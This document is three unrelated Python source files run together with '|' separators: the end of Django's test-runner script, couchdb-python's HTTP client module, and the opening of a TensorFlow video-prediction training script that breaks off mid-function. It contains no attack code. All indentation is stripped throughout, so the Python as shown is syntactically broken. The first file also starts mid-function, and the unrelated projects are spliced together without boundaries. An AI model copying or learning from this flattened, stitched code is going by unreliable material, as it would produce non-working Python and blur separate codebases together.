print('Aborting: A GIS database backend is required to run gis_tests.')
sys.exit(1)
def _module_match_label(module_label, label):
# Exact or ancestor match.
return module_label == label or module_label.startswith(label + '.')
# Load all the test model apps.
test_modules = get_test_modules()
found_start = not (start_at or start_after)
installed_app_names = set(get_installed())
for modpath, module_name in test_modules:
if modpath:
module_label = modpath + '.' + module_name
else:
module_label = module_name
if not found_start:
if start_at and _module_match_label(module_label, start_at):
found_start = True
elif start_after and _module_match_label(module_label, start_after):
found_start = True
continue
else:
continue
# if the module (or an ancestor) was named on the command line, or
# no modules were named (i.e., run all), import
# this module and add it to INSTALLED_APPS.
module_found_in_labels = not test_labels or any(
_module_match_label(module_label, label) for label in test_labels_set
)
if module_name in CONTRIB_TESTS_TO_APPS and module_found_in_labels:
settings.INSTALLED_APPS.append(CONTRIB_TESTS_TO_APPS[module_name])
if module_found_in_labels and module_label not in installed_app_names:
if verbosity >= 2:
print("Importing application %s" % module_name)
settings.INSTALLED_APPS.append(module_label)
# Add contrib.gis to INSTALLED_APPS if needed (rather than requiring
# @override_settings(INSTALLED_APPS=...) on all test cases.
gis = 'django.contrib.gis'
if connection.features.gis_enabled and gis not in settings.INSTALLED_APPS:
if verbosity >= 2:
print("Importing application %s" % gis)
settings.INSTALLED_APPS.append(gis)
apps.set_installed_apps(settings.INSTALLED_APPS)
return state
def teardown(state):
# Restore the old settings.
for key, value in state.items():
setattr(settings, key, value)
# Discard the multiprocessing.util finalizer that tries to remove a
# temporary directory that's already removed by this script's
# atexit.register(shutil.rmtree, TMPDIR) handler. Prevents
# FileNotFoundError at the end of a test run (#27890).
from multiprocessing.util import _finalizer_registry
_finalizer_registry.pop((-100, 0), None)
def actual_test_processes(parallel):
if parallel == 0:
# This doesn't work before django.setup() on some databases.
if all(conn.features.can_clone_databases for conn in connections.all()):
return default_test_processes()
else:
return 1
else:
return parallel
class ActionSelenium(argparse.Action):
"""
Validate the comma-separated list of requested browsers.
"""
def __call__(self, parser, namespace, values, option_string=None):
browsers = values.split(',')
for browser in browsers:
try:
SeleniumTestCaseBase.import_webdriver(browser)
except ImportError:
raise argparse.ArgumentError(self, "Selenium browser specification '%s' is not valid." % browser)
setattr(namespace, self.dest, browsers)
def django_tests(verbosity, interactive, failfast, keepdb, reverse,
test_labels, debug_sql, parallel, tags, exclude_tags,
test_name_patterns, start_at, start_after, pdb, buffer):
state = setup(verbosity, test_labels, parallel, start_at, start_after)
extra_tests = []
# Run the test suite, including the extra validation tests.
if not hasattr(settings, 'TEST_RUNNER'):
settings.TEST_RUNNER = 'django.test.runner.DiscoverRunner'
TestRunner = get_runner(settings)
test_runner = TestRunner(
verbosity=verbosity,
interactive=interactive,
failfast=failfast,
keepdb=keepdb,
reverse=reverse,
debug_sql=debug_sql,
parallel=actual_test_processes(parallel),
tags=tags,
exclude_tags=exclude_tags,
test_name_patterns=test_name_patterns,
pdb=pdb,
buffer=buffer,
)
failures = test_runner.run_tests(
test_labels or get_installed(),
extra_tests=extra_tests,
)
teardown(state)
return failures
def get_subprocess_args(options):
subprocess_args = [
sys.executable, __file__, '--settings=%s' % options.settings
]
if options.failfast:
subprocess_args.append('--failfast')
if options.verbosity:
subprocess_args.append('--verbosity=%s' % options.verbosity)
if not options.interactive:
subprocess_args.append('--noinput')
if options.tags:
subprocess_args.append('--tag=%s' % options.tags)
if options.exclude_tags:
subprocess_args.append('--exclude_tag=%s' % options.exclude_tags)
return subprocess_args
def bisect_tests(bisection_label, options, test_labels, parallel, start_at, start_after):
state = setup(options.verbosity, test_labels, parallel, start_at, start_after)
test_labels = test_labels or get_installed()
print('***** Bisecting test suite: %s' % ' '.join(test_labels))
# Make sure the bisection point isn't in the test list
# Also remove tests that need to be run in specific combinations
for label in [bisection_label, 'model_inheritance_same_model_name']:
try:
test_labels.remove(label)
except ValueError:
pass
subprocess_args = get_subprocess_args(options)
iteration = 1
while len(test_labels) > 1:
midpoint = len(test_labels) // 2
test_labels_a = test_labels[:midpoint] + [bisection_label]
test_labels_b = test_labels[midpoint:] + [bisection_label]
print('***** Pass %da: Running the first half of the test suite' % iteration)
print('***** Test labels: %s' % ' '.join(test_labels_a))
failures_a = subprocess.run(subprocess_args + test_labels_a)
print('***** Pass %db: Running the second half of the test suite' % iteration)
print('***** Test labels: %s' % ' '.join(test_labels_b))
print('')
failures_b = subprocess.run(subprocess_args + test_labels_b)
if failures_a.returncode and not failures_b.returncode:
print("***** Problem found in first half. Bisecting again...")
iteration += 1
test_labels = test_labels_a[:-1]
elif failures_b.returncode and not failures_a.returncode:
print("***** Problem found in second half. Bisecting again...")
iteration += 1
test_labels = test_labels_b[:-1]
elif failures_a.returncode and failures_b.returncode:
print("***** Multiple sources of failure found")
break
else:
print("***** No source of failure found... try pair execution (--pair)")
break
if len(test_labels) == 1:
print("***** Source of error: %s" % test_labels[0])
teardown(state)
def paired_tests(paired_test, options, test_labels, parallel, start_at, start_after):
state = setup(options.verbosity, test_labels, parallel, start_at, start_after)
test_labels = test_labels or get_installed()
print('***** Trying paired execution')
# Make sure the constant member of the pair isn't in the test list
# Also remove tests that need to be run in specific combinations
for label in [paired_test, 'model_inheritance_same_model_name']:
try:
test_labels.remove(label)
except ValueError:
pass
subprocess_args = get_subprocess_args(options)
for i, label in enumerate(test_labels):
print('***** %d of %d: Check test pairing with %s' % (
i + 1, len(test_labels), label))
failures = subprocess.call(subprocess_args + [label, paired_test])
if failures:
print('***** Found problem pair with %s' % label)
return
print('***** No problem pair found')
teardown(state)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Run the Django test suite.")
parser.add_argument(
'modules', nargs='*', metavar='module',
help='Optional path(s) to test modules; e.g. "i18n" or '
'"i18n.tests.TranslationTests.test_lazy_objects".',
)
parser.add_argument(
'-v', '--verbosity', default=1, type=int, choices=[0, 1, 2, 3],
help='Verbosity level; 0=minimal output, 1=normal output, 2=all output',
)
parser.add_argument(
'--noinput', action='store_false', dest='interactive',
help='Tells Django to NOT prompt the user for input of any kind.',
)
parser.add_argument(
'--failfast', action='store_true',
help='Tells Django to stop running the test suite after first failed test.',
)
parser.add_argument(
'--keepdb', action='store_true',
help='Tells Django to preserve the test database between runs.',
)
parser.add_argument(
'--settings',
help='Python path to settings module, e.g. "myproject.settings". If '
'this isn\'t provided, either the DJANGO_SETTINGS_MODULE '
'environment variable or "test_sqlite" will be used.',
)
parser.add_argument(
'--bisect',
help='Bisect the test suite to discover a test that causes a test '
'failure when combined with the named test.',
)
parser.add_argument(
'--pair',
help='Run the test suite in pairs with the named test to find problem pairs.',
)
parser.add_argument(
'--reverse', action='store_true',
help='Sort test suites and test cases in opposite order to debug '
'test side effects not apparent with normal execution lineup.',
)
parser.add_argument(
'--selenium', action=ActionSelenium, metavar='BROWSERS',
help='A comma-separated list of browsers to run the Selenium tests against.',
)
parser.add_argument(
'--headless', action='store_true',
help='Run selenium tests in headless mode, if the browser supports the option.',
)
parser.add_argument(
'--selenium-hub',
help='A URL for a selenium hub instance to use in combination with --selenium.',
)
parser.add_argument(
'--external-host', default=socket.gethostname(),
help='The external host that can be reached by the selenium hub instance when running Selenium '
'tests via Selenium Hub.',
)
parser.add_argument(
'--debug-sql', action='store_true',
help='Turn on the SQL query logger within tests.',
)
parser.add_argument(
'--parallel', nargs='?', default=0, type=int,
const=default_test_processes(), metavar='N',
help='Run tests using up to N parallel processes.',
)
parser.add_argument(
'--tag', dest='tags', action='append',
help='Run only tests with the specified tags. Can be used multiple times.',
)
parser.add_argument(
'--exclude-tag', dest='exclude_tags', action='append',
help='Do not run tests with the specified tag. Can be used multiple times.',
)
parser.add_argument(
'--start-after', dest='start_after',
help='Run tests starting after the specified top-level module.',
)
parser.add_argument(
'--start-at', dest='start_at',
help='Run tests starting at the specified top-level module.',
)
parser.add_argument(
'--pdb', action='store_true',
help='Runs the PDB debugger on error or failure.'
)
parser.add_argument(
'-b', '--buffer', action='store_true',
help='Discard output of passing tests.',
)
if PY37:
parser.add_argument(
'-k', dest='test_name_patterns', action='append',
help=(
'Only run test methods and classes matching test name pattern. '
'Same as unittest -k option. Can be used multiple times.'
),
)
options = parser.parse_args()
using_selenium_hub = options.selenium and options.selenium_hub
if options.selenium_hub and not options.selenium:
parser.error('--selenium-hub and --external-host require --selenium to be used.')
if using_selenium_hub and not options.external_host:
parser.error('--selenium-hub and --external-host must be used together.')
# Allow including a trailing slash on app_labels for tab completion convenience
options.modules = [os.path.normpath(labels) for labels in options.modules]
mutually_exclusive_options = [options.start_at, options.start_after, options.modules]
enabled_module_options = [bool(option) for option in mutually_exclusive_options].count(True)
if enabled_module_options > 1:
print('Aborting: --start-at, --start-after, and test labels are mutually exclusive.')
sys.exit(1)
for opt_name in ['start_at', 'start_after']:
opt_val = getattr(options, opt_name)
if opt_val:
if '.' in opt_val:
print('Aborting: --%s must be a top-level module.' % opt_name.replace('_', '-'))
sys.exit(1)
setattr(options, opt_name, os.path.normpath(opt_val))
if options.settings:
os.environ['DJANGO_SETTINGS_MODULE'] = options.settings
else:
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'test_sqlite')
options.settings = os.environ['DJANGO_SETTINGS_MODULE']
if options.selenium:
if not options.tags:
options.tags = ['selenium']
elif 'selenium' not in options.tags:
options.tags.append('selenium')
if options.selenium_hub:
SeleniumTestCaseBase.selenium_hub = options.selenium_hub
SeleniumTestCaseBase.external_host = options.external_host
SeleniumTestCaseBase.headless = options.headless
SeleniumTestCaseBase.browsers = options.selenium
if options.bisect:
bisect_tests(
options.bisect, options, options.modules, options.parallel,
options.start_at, options.start_after,
)
elif options.pair:
paired_tests(
options.pair, options, options.modules, options.parallel,
options.start_at, options.start_after,
)
else:
failures = django_tests(
options.verbosity, options.interactive, options.failfast,
options.keepdb, options.reverse, options.modules,
options.debug_sql, options.parallel, options.tags,
options.exclude_tags,
getattr(options, 'test_name_patterns', None),
options.start_at, options.start_after, options.pdb, options.buffer,
)
if failures:
sys.exit(1)
|
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2009 Christopher Lenz
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution.
"""Simple HTTP client implementation based on the ``httplib`` module in the
standard library.
"""
from base64 import b64encode
from datetime import datetime
import errno
from httplib import BadStatusLine, HTTPConnection, HTTPSConnection
import socket
import time
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
import sys
try:
from threading import Lock
except ImportError:
from dummy_threading import Lock
import urllib
from urlparse import urlsplit, urlunsplit
from email.Utils import parsedate
from couchdb import json
__all__ = ['HTTPError', 'PreconditionFailed', 'ResourceNotFound',
'ResourceConflict', 'ServerError', 'Unauthorized', 'RedirectLimit',
'Session', 'Resource']
__docformat__ = 'restructuredtext en'
if sys.version < '2.6':
class TimeoutMixin:
"""Helper mixin to add timeout before socket connection"""
# taken from original python2.5 httplib source code with timeout setting added
def connect(self):
"""Connect to the host and port specified in __init__."""
msg = "getaddrinfo returns an empty list"
for res in socket.getaddrinfo(self.host, self.port, 0,
socket.SOCK_STREAM):
af, socktype, proto, canonname, sa = res
try:
self.sock = socket.socket(af, socktype, proto)
if self.debuglevel > 0:
print "connect: (%s, %s)" % (self.host, self.port)
# setting socket timeout
self.sock.settimeout(self.timeout)
self.sock.connect(sa)
except socket.error, msg:
if self.debuglevel > 0:
print 'connect fail:', (self.host, self.port)
if self.sock:
self.sock.close()
self.sock = None
continue
break
if not self.sock:
raise socket.error, msg
_HTTPConnection = HTTPConnection
_HTTPSConnection = HTTPSConnection
class HTTPConnection(TimeoutMixin, _HTTPConnection):
def __init__(self, *a, **k):
timeout = k.pop('timeout', None)
_HTTPConnection.__init__(self, *a, **k)
self.timeout = timeout
class HTTPSConnection(TimeoutMixin, _HTTPSConnection):
def __init__(self, *a, **k):
timeout = k.pop('timeout', None)
_HTTPSConnection.__init__(self, *a, **k)
self.timeout = timeout
if sys.version < '2.7':
from httplib import CannotSendHeader, _CS_REQ_STARTED, _CS_REQ_SENT
class NagleMixin:
"""
Mixin to upgrade httplib connection types so headers and body can be
sent at the same time to avoid triggering Nagle's algorithm.
Based on code originally copied from Python 2.7's httplib module.
"""
def endheaders(self, message_body=None):
if self.__dict__['_HTTPConnection__state'] == _CS_REQ_STARTED:
self.__dict__['_HTTPConnection__state'] = _CS_REQ_SENT
else:
raise CannotSendHeader()
self._send_output(message_body)
def _send_output(self, message_body=None):
self._buffer.extend(("", ""))
msg = "\r\n".join(self._buffer)
del self._buffer[:]
if isinstance(message_body, str):
msg += message_body
message_body = None
self.send(msg)
if message_body is not None:
self.send(message_body)
class HTTPConnection(NagleMixin, HTTPConnection):
pass
class HTTPSConnection(NagleMixin, HTTPSConnection):
pass
class HTTPError(Exception):
"""Base class for errors based on HTTP status codes >= 400."""
class PreconditionFailed(HTTPError):
"""Exception raised when a 412 HTTP error is received in response to a
request.
"""
class ResourceNotFound(HTTPError):
"""Exception raised when a 404 HTTP error is received in response to a
request.
"""
class ResourceConflict(HTTPError):
"""Exception raised when a 409 HTTP error is received in response to a
request.
"""
class ServerError(HTTPError):
"""Exception raised when an unexpected HTTP error is received in response
to a request.
"""
class Unauthorized(HTTPError):
"""Exception raised when the server requires authentication credentials
but either none are provided, or they are incorrect.
"""
class RedirectLimit(Exception):
"""Exception raised when a request is redirected more often than allowed
by the maximum number of redirections.
"""
CHUNK_SIZE = 1024 * 8
class ResponseBody(object):
def __init__(self, resp, callback):
self.resp = resp
self.callback = callback
def read(self, size=None):
bytes = self.resp.read(size)
if size is None or len(bytes) < size:
self.close()
return bytes
def close(self):
while not self.resp.isclosed():
self.resp.read(CHUNK_SIZE)
if self.callback:
self.callback()
self.callback = None
def iterchunks(self):
assert self.resp.msg.get('transfer-encoding') == 'chunked'
while True:
if self.resp.isclosed():
break
chunksz = int(self.resp.fp.readline().strip(), 16)
if not chunksz:
self.resp.fp.read(2) #crlf
self.resp.close()
self.callback()
break
chunk = self.resp.fp.read(chunksz)
for ln in chunk.splitlines():
yield ln
self.resp.fp.read(2) #crlf
RETRYABLE_ERRORS = frozenset([
errno.EPIPE, errno.ETIMEDOUT,
errno.ECONNRESET, errno.ECONNREFUSED, errno.ECONNABORTED,
errno.EHOSTDOWN, errno.EHOSTUNREACH,
errno.ENETRESET, errno.ENETUNREACH, errno.ENETDOWN
])
class Session(object):
def __init__(self, cache=None, timeout=None, max_redirects=5,
retry_delays=[0], retryable_errors=RETRYABLE_ERRORS):
"""Initialize an HTTP client session.
:param cache: an instance with a dict-like interface or None to allow
Session to create a dict for caching.
:param timeout: socket timeout in number of seconds, or `None` for no
timeout (the default)
:param retry_delays: list of request retry delays.
"""
from couchdb import __version__ as VERSION
self.user_agent = 'CouchDB-Python/%s' % VERSION
# XXX We accept a `cache` dict arg, but the ref gets overwritten later
# during cache cleanup. Do we remove the cache arg (does using a shared
# Session instance cover the same use cases?) or fix the cache cleanup?
# For now, let's just assign the dict to the Cache instance to retain
# current behaviour.
if cache is not None:
cache_by_url = cache
cache = Cache()
cache.by_url = cache_by_url
else:
cache = Cache()
self.cache = cache
self.max_redirects = max_redirects
self.perm_redirects = {}
self.connection_pool = ConnectionPool(timeout)
self.retry_delays = list(retry_delays) # We don't want this changing on us.
self.retryable_errors = set(retryable_errors)
def request(self, method, url, body=None, headers=None, credentials=None,
num_redirects=0):
if url in self.perm_redirects:
url = self.perm_redirects[url]
method = method.upper()
if headers is None:
headers = {}
headers.setdefault('Accept', 'application/json')
headers['User-Agent'] = self.user_agent
cached_resp = None
if method in ('GET', 'HEAD'):
cached_resp = self.cache.get(url)
if cached_resp is not None:
etag = cached_resp[1].get('etag')
if etag:
headers['If-None-Match'] = etag
if (body is not None and not isinstance(body, basestring) and
not hasattr(body, 'read')):
body = json.encode(body)
if isinstance(body, unicode):
body = body.encode('utf-8')
headers.setdefault('Content-Type', 'application/json')
if body is None:
headers.setdefault('Content-Length', '0')
elif isinstance(body, basestring):
headers.setdefault('Content-Length', str(len(body)))
else:
headers['Transfer-Encoding'] = 'chunked'
authorization = basic_auth(credentials)
if authorization:
headers['Authorization'] = authorization
path_query = urlunsplit(('', '') + urlsplit(url)[2:4] + ('',))
conn = self.connection_pool.get(url)
def _try_request_with_retries(retries):
while True:
try:
return _try_request()
except socket.error, e:
ecode = e.args[0]
if ecode not in self.retryable_errors:
raise
try:
delay = retries.next()
except StopIteration:
# No more retries, raise last socket error.
raise e
time.sleep(delay)
conn.close()
def _try_request():
try:
conn.putrequest(method, path_query, skip_accept_encoding=True)
for header in headers:
conn.putheader(header, headers[header])
if body is None:
conn.endheaders()
else:
if isinstance(body, str):
conn.endheaders(body)
else: # assume a file-like object and send in chunks
conn.endheaders()
while 1:
chunk = body.read(CHUNK_SIZE)
if not chunk:
break
conn.send(('%x\r\n' % len(chunk)) + chunk + '\r\n')
conn.send('0\r\n\r\n')
return conn.getresponse()
except BadStatusLine, e:
# httplib raises a BadStatusLine when it cannot read the status
# line saying, "Presumably, the server closed the connection
# before sending a valid response."
# Raise as ECONNRESET to simplify retry logic.
if e.line == '' or e.line == "''":
raise socket.error(errno.ECONNRESET)
else:
raise
resp = _try_request_with_retries(iter(self.retry_delays))
status = resp.status
# Handle conditional response
if status == 304 and method in ('GET', 'HEAD'):
resp.read()
self.connection_pool.release(url, conn)
status, msg, data = cached_resp
if data is not None:
data = StringIO(data)
return status, msg, data
elif cached_resp:
self.cache.remove(url)
# Handle redirects
if status == 303 or \
method in ('GET', 'HEAD') and status in (301, 302, 307):
resp.read()
self.connection_pool.release(url, conn)
if num_redirects > self.max_redirects:
raise RedirectLimit('Redirection limit exceeded')
location = resp.getheader('location')
if status == 301:
self.perm_redirects[url] = location
elif status == 303:
method = 'GET'
return self.request(method, location, body, headers,
num_redirects=num_redirects + 1)
data = None
streamed = False
# Read the full response for empty responses so that the connection is
# in good state for the next request
if method == 'HEAD' or resp.getheader('content-length') == '0' or \
status < 200 or status in (204, 304):
resp.read()
self.connection_pool.release(url, conn)
# Buffer small non-JSON response bodies
elif int(resp.getheader('content-length', sys.maxint)) < CHUNK_SIZE:
data = resp.read()
self.connection_pool.release(url, conn)
# For large or chunked response bodies, do not buffer the full body,
# and instead return a minimal file-like object
else:
data = ResponseBody(resp,
lambda: self.connection_pool.release(url, conn))
streamed = True
# Handle errors
if status >= 400:
ctype = resp.getheader('content-type')
if data is not None and 'application/json' in ctype:
data = json.decode(data)
error = data.get('error'), data.get('reason')
elif method != 'HEAD':
error = resp.read()
self.connection_pool.release(url, conn)
else:
error = ''
if status == 401:
raise Unauthorized(error)
elif status == 404:
raise ResourceNotFound(error)
elif status == 409:
raise ResourceConflict(error)
elif status == 412:
raise PreconditionFailed(error)
else:
raise ServerError((status, error))
# Store cachable responses
if not streamed and method == 'GET' and 'etag' in resp.msg:
self.cache.put(url, (status, resp.msg, data))
if not streamed and data is not None:
data = StringIO(data)
return status, resp.msg, data
def cache_sort(i):
return datetime.fromtimestamp(time.mktime(parsedate(i[1][1]['Date'])))
class Cache(object):
"""Content cache."""
# Some random values to limit memory use
keep_size, max_size = 10, 75
def __init__(self):
self.by_url = {}
def get(self, url):
return self.by_url.get(url)
def put(self, url, response):
self.by_url[url] = response
if len(self.by_url) > self.max_size:
self._clean()
def remove(self, url):
self.by_url.pop(url, None)
def _clean(self):
ls = sorted(self.by_url.iteritems(), key=cache_sort)
self.by_url = dict(ls[-self.keep_size:])
class ConnectionPool(object):
"""HTTP connection pool."""
def __init__(self, timeout):
self.timeout = timeout
self.conns = {} # HTTP connections keyed by (scheme, host)
self.lock = Lock()
def get(self, url):
scheme, host = urlsplit(url, 'http', False)[:2]
# Try to reuse an existing connection.
self.lock.acquire()
try:
conns = self.conns.setdefault((scheme, host), [])
if conns:
conn = conns.pop(-1)
else:
conn = None
finally:
self.lock.release()
# Create a new connection if nothing was available.
if conn is None:
if scheme == 'http':
cls = HTTPConnection
elif scheme == 'https':
cls = HTTPSConnection
else:
raise ValueError('%s is not a supported scheme' % scheme)
conn = cls(host, timeout=self.timeout)
conn.connect()
return conn
def release(self, url, conn):
scheme, host = urlsplit(url, 'http', False)[:2]
self.lock.acquire()
try:
self.conns.setdefault((scheme, host), []).append(conn)
finally:
self.lock.release()
def __del__(self):
for key, conns in list(self.conns.items()):
for conn in conns:
conn.close()
class Resource(object):
def __init__(self, url, session, headers=None):
self.url, self.credentials = extract_credentials(url)
if session is None:
session = Session()
self.session = session
self.headers = headers or {}
def __call__(self, *path):
obj = type(self)(urljoin(self.url, *path), self.session)
obj.credentials = self.credentials
obj.headers = self.headers.copy()
return obj
def delete(self, path=None, headers=None, **params):
return self._request('DELETE', path, headers=headers, **params)
def get(self, path=None, headers=None, **params):
return self._request('GET', path, headers=headers, **params)
def head(self, path=None, headers=None, **params):
return self._request('HEAD', path, headers=headers, **params)
def post(self, path=None, body=None, headers=None, **params):
return self._request('POST', path, body=body, headers=headers,
**params)
def put(self, path=None, body=None, headers=None, **params):
return self._request('PUT', path, body=body, headers=headers, **params)
def delete_json(self, path=None, headers=None, **params):
return self._request_json('DELETE', path, headers=headers, **params)
def get_json(self, path=None, headers=None, **params):
return self._request_json('GET', path, headers=headers, **params)
def post_json(self, path=None, body=None, headers=None, **params):
return self._request_json('POST', path, body=body, headers=headers,
**params)
def put_json(self, path=None, body=None, headers=None, **params):
return self._request_json('PUT', path, body=body, headers=headers,
**params)
def _request(self, method, path=None, body=None, headers=None, **params):
all_headers = self.headers.copy()
all_headers.update(headers or {})
if path is not None:
url = urljoin(self.url, path, **params)
else:
url = urljoin(self.url, **params)
return self.session.request(method, url, body=body,
headers=all_headers,
credentials=self.credentials)
def _request_json(self, method, path=None, body=None, headers=None, **params):
status, headers, data = self._request(method, path, body=body,
headers=headers, **params)
if 'application/json' in headers.get('content-type'):
data = json.decode(data.read())
return status, headers, data
def extract_credentials(url):
"""Extract authentication (user name and password) credentials from the
given URL.
>>> extract_credentials('http://localhost:5984/_config/')
('http://localhost:5984/_config/', None)
>>> extract_credentials('http://joe:secret@localhost:5984/_config/')
('http://localhost:5984/_config/', ('joe', 'secret'))
>>> extract_credentials('http://joe%40example.com:secret@localhost:5984/_config/')
('http://localhost:5984/_config/', ('joe@example.com', 'secret'))
"""
parts = urlsplit(url)
netloc = parts[1]
if '@' in netloc:
creds, netloc = netloc.split('@')
credentials = tuple(urllib.unquote(i) for i in creds.split(':'))
parts = list(parts)
parts[1] = netloc
else:
credentials = None
return urlunsplit(parts), credentials
def basic_auth(credentials):
if credentials:
return 'Basic %s' % b64encode('%s:%s' % credentials)
def quote(string, safe=''):
if isinstance(string, unicode):
string = string.encode('utf-8')
return urllib.quote(string, safe)
def urlencode(data):
if isinstance(data, dict):
data = data.items()
params = []
for name, value in data:
if isinstance(value, unicode):
value = value.encode('utf-8')
params.append((name, value))
return urllib.urlencode(params)
def urljoin(base, *path, **query):
"""Assemble a uri based on a base, any number of path segments, and query
string parameters.
>>> urljoin('http://example.org', '_all_dbs')
'http://example.org/_all_dbs'
A trailing slash on the uri base is handled gracefully:
>>> urljoin('http://example.org/', '_all_dbs')
'http://example.org/_all_dbs'
And multiple positional arguments become path parts:
>>> urljoin('http://example.org/', 'foo', 'bar')
'http://example.org/foo/bar'
All slashes within a path part are escaped:
>>> urljoin('http://example.org/', 'foo/bar')
'http://example.org/foo%2Fbar'
>>> urljoin('http://example.org/', 'foo', '/bar/')
'http://example.org/foo/%2Fbar%2F'
>>> urljoin('http://example.org/', None) #doctest:+IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
...
TypeError: argument 2 to map() must support iteration
"""
if base and base.endswith('/'):
base = base[:-1]
retval = [base]
# build the path
path = '/'.join([''] + [quote(s) for s in path])
if path:
retval.append(path)
# build the query string
params = []
for name, value in query.items():
if type(value) in (list, tuple):
params.extend([(name, i) for i in value if i is not None])
elif value is not None:
if value is True:
value = 'true'
elif value is False:
value = 'false'
params.append((name, value))
if params:
retval.extend(['?', urlencode(params)])
return ''.join(retval)
|
|
# Copyright 2016 The TensorFlow Authors All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Code for training the prediction model."""
import numpy as np
import tensorflow as tf
from tensorflow.python.platform import app
from tensorflow.python.platform import flags
from prediction_input import build_tfrecord_input
from prediction_model import construct_model
# How often to record tensorboard summaries.
SUMMARY_INTERVAL = 40
# How often to run a batch through the validation model.
VAL_INTERVAL = 200
# How often to save a model checkpoint
SAVE_INTERVAL = 2000
# tf record data location:
DATA_DIR = '/home/wangyang59/Data/robot/push/push_train'
# local output directory
OUT_DIR = '/home/wangyang59/Projects/tf_models/video_prediction/tmp/data/stp_run'
FLAGS = flags.FLAGS
flags.DEFINE_string('data_dir', DATA_DIR, 'directory containing data.')
flags.DEFINE_string('output_dir', OUT_DIR, 'directory for model checkpoints.')
flags.DEFINE_string('event_log_dir', OUT_DIR, 'directory for writing summary.')
flags.DEFINE_integer('num_iterations', 100000, 'number of training iterations.')
flags.DEFINE_string('pretrained_model', '',
'filepath of a pretrained model to initialize from.')
flags.DEFINE_integer('sequence_length', 10,
'sequence length, including context frames.')
flags.DEFINE_integer('context_frames', 2, '# of frames before predictions.')
flags.DEFINE_integer('use_state', 1,
'Whether or not to give the state+action to the model')
flags.DEFINE_string('model', 'CDNA',
'model architecture to use - CDNA, DNA, or STP')
flags.DEFINE_integer('num_masks', 10,
'number of masks, usually 1 for DNA, 10 for CDNA, STN.')
flags.DEFINE_float('schedsamp_k', 900.0,
'The k hyperparameter for scheduled sampling,'
'-1 for no scheduled sampling.')
flags.DEFINE_float('train_val_split', 0.95,
'The percentage of files to use for the training set,'
' vs. the validation set.')
flags.DEFINE_integer('batch_size', 32, 'batch size for training')
flags.DEFINE_float('learning_rate', 0.001,
'the base learning rate of the generator')
flags.DEFINE_integer('num_gpus', 1,
'the number of gpu to use')
## Helper functions
def peak_signal_to_noise_ratio(true, pred):
"""Image quality metric based on maximal signal power vs. power of the noise.
Args:
true: the ground truth image.
pred: the predicted image.
Returns:
peak signal to noise ratio (PSNR)
"""
return 10.0 * tf.log(1.0 / mean_squared_error(true, pred)) / tf.log(10.0)
def mean_squared_error(true, pred):
"""L2 distance between tensors true and pred.
Args:
true: the ground truth image.
pred: the predicted image.
Returns:
mean squared error between ground truth and predicted image.
"""
return tf.reduce_sum(tf.square(true - pred)) / tf.to_float(tf.size(pred))
class Model(object):
def __init__(self,
images=None,
actions=None,
states=None,
sequence_length=None,
reuse_scope=None,
prefix="train"):
if sequence_length is None:
sequence_length = FLAGS.sequence_length
self.iter_num = tf.placeholder(tf.float32, [])
summaries = []
# Split into timesteps.
actions = tf.split(axis=1, num_or_size_splits=int(actions.get_shape()[1]), value=actions)
actions = [tf.squeeze(act) for act in actions]
states = tf.split(axis=1, num_or_size_splits=int(states.get_shape()[1]), value=states)
states = [tf.squeeze(st) for st in states]
images = tf.split(axis=1, num_or_size_splits=int(images.get_shape()[1]), value=images)
images = [tf.squeeze(img) for img in images]
if reuse_scope is None:
gen_images, gen_states = construct_model(
images,
actions,
states,
iter_num=self.iter_num,
k=FLAGS.schedsamp_k,
use_state=FLAGS.use_state,
num_masks=FLAGS.num_masks,
cdna=FLAGS.model == 'CDNA',
dna=FLAGS.model == 'DNA',
stp=FLAGS.model == 'STP',
context_frames=FLAGS.context_frames)
else: # If it's a validation or test model.
with tf.variable_scope(reuse_scope, reuse=True):
gen_images, gen_states = construct_model(
images,
actions,
states,
iter_num=self.iter_num,
k=FLAGS.schedsamp_k,
use_state=FLAGS.use_state,
num_masks=FLAGS.num_masks,
cdna=FLAGS.model == 'CDNA',
dna=FLAGS.model == 'DNA',
stp=FLAGS.model == 'STP',
context_frames=FLAGS.context_frames)
# L2 loss, PSNR for eval.
loss, psnr_all = 0.0, 0.0
for i, x, gx in zip(
range(len(gen_images)), images[FLAGS.context_frames:],
gen_images[FLAGS.context_frames - 1:]):
recon_cost = mean_squared_error(x, gx)
psnr_i = peak_signal_to_noise_ratio(x, gx)
psnr_all += psnr_i
summaries.append(
tf.summary.scalar(prefix + '_recon_cost' + str(i), recon_cost))
summaries.append(tf.summary.scalar(prefix + '_psnr' + str(i), psnr_i))
loss += recon_cost
for i, state, gen_state in zip(
range(len(gen_states)), states[FLAGS.context_frames:],
gen_states[FLAGS.context_frames - 1:]):
state_cost = mean_squared_error(state, gen_state) * 1e-4
summaries.append(
tf.summary.scalar(prefix + '_state_cost' + str(i), state_cost))
loss += state_cost
summaries.append(tf.summary.scalar(prefix + '_psnr_all', psnr_all))
self.psnr_all = psnr_all
self.loss = loss = loss / np.float32(len(images) - FLAGS.context_frames)
summaries.append(tf.summary.scalar(prefix + '_loss', loss))
self.lr = tf.placeholder_with_default(FLAGS.learning_rate, ())
self.train_op = tf.train.AdamOptimizer(self.lr).minimize(loss)
self.summ_op = tf.summary.merge(summaries)
def main(unused_argv):
print 'Constructing models and inputs.'
with tf.variable_scope('model', reuse=None) as training_scope:
images, actions, states = build_tfrecord_input(training=True)
model = Model(images, actions, states, FLAGS.sequence_length)
with tf.variable_scope('val_model', reuse=None):
val_images, val_actions, val_states = build_tfrecord_input(training=False)
val_model = Model(val_images, val_actions, val_states,
FLAGS.sequence_length, training_scope, "val")
print 'Constructing saver.'
# Make saver.
saver = tf.train.Saver(
tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES), max_to_keep=0)
# Make training session.
sess = tf.InteractiveSession()
